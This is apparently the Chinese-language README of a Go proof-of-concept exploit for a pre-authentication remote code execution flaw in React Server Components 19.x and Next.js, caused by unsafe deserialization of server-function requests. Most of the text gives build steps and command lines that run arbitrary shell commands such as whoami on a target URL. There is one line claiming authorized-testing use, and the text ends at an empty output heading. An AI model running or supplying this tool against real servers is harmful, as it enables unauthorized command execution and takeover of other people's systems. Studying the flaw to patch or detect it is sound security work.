针对 React 服务端组件 (RSC) / Next.js 远程代码执行漏洞的概念验证 (PoC)。
React Server Components 版本 19.0.0、19.1.0、19.1.1 和 19.2.0 中存在一个无需预认证的远程代码执行漏洞,涉及以下包:react-server-dom-parcel、react-server-dom-turbopack 和 react-server-dom-webpack。存在漏洞的代码不安全地从 HTTP 请求中反序列化发往服务端函数端点的负载。
⚠️ 警告:此工具仅用于授权的安全测试。
go build -o exploit exploit.go
或者直接运行:
go run exploit.go
./exploit -u <URL> -c <命令>
-u - 目标 URL(必需)-c - 要执行的命令(默认:id)# 基本用法
./exploit -u https://vulnerable -c "whoami"
# 执行不同的命令
./exploit -u https://vulnerable -c "ls -la"
# 直接使用 go 运行
go run exploit.go -u https://vulnerable -c "pwd"

工具输出: